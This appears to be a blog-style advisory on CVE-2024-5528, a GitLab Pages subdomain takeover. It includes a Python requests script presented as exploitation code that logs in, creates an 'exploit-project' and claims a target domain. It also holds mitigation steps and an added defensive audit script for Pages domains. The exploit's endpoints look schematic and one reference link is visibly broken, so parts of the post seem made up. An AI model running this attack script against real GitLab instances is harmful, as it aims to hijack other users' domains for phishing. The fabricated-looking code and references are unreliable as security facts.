A recent cybersecurity issue, identified as CVE-2024-5528, has been discovered in GitLab Community Edition (CE) and Enterprise Edition (EE), affecting versions prior to 16.11.6, 17.0 prior to 17.0.4, and 17.1 prior to 17.1.2. This vulnerability allows malicious actors to take over subdomains in GitLab Pages, potentially leading to the compromise of users' data and unauthorized access to sensitive information.

In this post, we will discuss details of the vulnerability, its impact, and steps that can be taken to mitigate it. We will also include code snippets and links to original references for a deeper understanding.

Vulnerability Details

The vulnerability lies in the way GitLab CE/EE handles user-defined domains for the GitLab Pages feature. An attacker with access to a GitLab instance can exploit it to take over a subdomain that was previously assigned to another user, simply by registering a new GitLab Pages project using the same domain name. This can compromise the confidentiality, integrity, and availability of the data associated with the targeted subdomain.

Here's a code snippet demonstrating the exploitation of this vulnerability:

import requests

# Replace variables with your own GitLab instance information
gitlab_url = "https://yourgitlab.com/"
email = "your@email.com"
password = "your_password"

# Authenticate to GitLab and obtain session token
session = requests.Session()
login_data = {'user[login]': email, 'user[password]': password}
gitlab_login = session.post(gitlab_url + "users/sign_in", data=login_data)

# Create a new GitLab project with the target domain
project_data = {'path': 'exploit-project', 'name': 'Exploit Project'}
gitlab_project = session.post(gitlab_url + "projects", data=project_data)

# Enable Pages feature for the project and register the target domain
pages_data = {'domain': 'target-domain.com'}
gitlab_pages = session.post(gitlab_url + "projects/exploit-project/pages", data=pages_data)

The code above demonstrates an attacker authenticating to a GitLab instance, creating a new project, enabling GitLab Pages, and then registering the target domain. This allows the attacker to effectively take control of the targeted subdomain.

Original References

- https://gitlab.com/gitlab-org/gitlab/security/gitlab-ce/-/issues/649
- https://gitlab.com/gitlab-org/gitlab/security/cli-5./-/issues/1

Impact and Exploitation

An attacker who successfully exploits this vulnerability can potentially perform various malicious activities. Some examples include:

- Hosting malicious content on the compromised subdomain.
- Phishing attacks that impersonate a legitimate service on the hijacked subdomain.

Mitigation

To prevent subdomain takeover, users of affected GitLab CE/EE versions should immediately upgrade their installations to the latest patched versions, which are:

- GitLab CE/EE 16.11.6
- GitLab CE/EE 17.0.4
- GitLab CE/EE 17.1.2

After updating, users are advised to verify the ownership of their domains by checking the GitLab Pages settings of each project, and to remove any unused domains from their accounts.
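One way to carry out that verification step in bulk, as an added example that is not part of the original post: audit every custom domain attached to GitLab Pages for a missing or mismatched ownership proof and for DNS that still routes to the Pages server after the project that used it is gone. It assumes GitLab's documented verification scheme (a TXT record at _gitlab-pages-verification-code.<domain> whose value is gitlab-pages-verification-code=<code>); the Pages hostname, the domain inventory and the DNS answers are constructed sample data, and the lookup function is a stand-in for a real resolver.

```python
# Added example, not from the post: audit custom domains attached to GitLab Pages
# for missing ownership proof and dangling DNS. Assumes GitLab's documented scheme:
# TXT at _gitlab-pages-verification-code.<domain> = "gitlab-pages-verification-code=<code>".
from dataclasses import dataclass

PAGES_HOST = "pages.example.com"  # constructed: hostname your Pages server uses

@dataclass
class PagesDomain:
    domain: str
    verification_code: str  # code shown in the project's Pages settings
    still_used: bool        # does a live project still serve this domain?

def audit(domains, lookup):
    # lookup(name, rtype) -> list of record values ([] if the name is absent).
    # Swap in a real resolver (e.g. dnspython) for live use.
    findings = {}
    for d in domains:
        issues = []
        # 1. Ownership proof: the verification TXT must exist and match the code.
        txt = lookup(f"_gitlab-pages-verification-code.{d.domain}", "TXT")
        if f"gitlab-pages-verification-code={d.verification_code}" not in txt:
            issues.append("verification TXT missing or mismatched")
        # 2. Dangling pointer: DNS routes to Pages although no project serves it.
        cname = lookup(d.domain, "CNAME")
        points_to_pages = any(c.rstrip(".") == PAGES_HOST for c in cname)
        if points_to_pages and not d.still_used:
            issues.append("DNS still points at Pages but domain is unused: remove it")
        elif d.still_used and not points_to_pages:
            issues.append("DNS no longer points at Pages: stale configuration")
        if issues:
            findings[d.domain] = issues
    return findings

# Constructed DNS answers standing in for a real resolver.
SAMPLE_DNS = {
    ("_gitlab-pages-verification-code.docs.example.org", "TXT"): ["gitlab-pages-verification-code=0011aabb"],
    ("docs.example.org", "CNAME"): ["pages.example.com."],
    ("old.example.org", "CNAME"): ["pages.example.com."],  # project deleted, record left behind
}

def sample_lookup(name, rtype):
    return SAMPLE_DNS.get((name, rtype), [])

SAMPLE_INVENTORY = [
    PagesDomain("docs.example.org", "0011aabb", still_used=True),
    PagesDomain("old.example.org", "ccdd2233", still_used=False),
]
```

Running audit(SAMPLE_INVENTORY, sample_lookup) reports nothing for docs.example.org and two findings for old.example.org, the left-behind record that a newly registered Pages project could claim.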

Conclusion

CVE-2024-5528 is a critical vulnerability that affects GitLab CE/EE, allowing attackers to take over subdomains in GitLab Pages. To protect against this threat, users should update their GitLab installations to the latest patched versions and verify the ownership of their domains. As a best practice, users should always keep their software up to date and regularly monitor their domain settings to safeguard against potential cyber threats.

Timeline

Published on: 02/05/2025 11:15:17 UTC
Last modified on: 02/05/2025 20:15:45 UTC